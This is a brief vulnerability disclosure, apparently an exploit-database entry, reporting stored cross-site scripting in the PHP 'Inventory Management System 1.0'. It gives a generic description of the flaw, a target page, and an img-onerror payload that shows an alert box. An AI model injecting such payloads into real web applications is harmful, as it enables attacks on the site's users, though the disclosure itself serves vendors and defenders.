## Title: Inventory Management System 1.0 XSS Stored 
## Author: Hejap Zairy
## Date: 12.07.2022
## Vendor: https://www.vetbossel.in/inventory-management-system-php/
## Software: https://cutt.ly/lOZ8lrr
## Reference: https://github.com/Matrix07ksa
# Tested on: ArchLinux, MySQL, Apache

## Description:
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Status: CRITICAL
[+] Payloads:
```
https://0day_script.gov//Inventory_Modify.php
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
```

## Proof and Exploit:
https://streamable.com/4v5h6u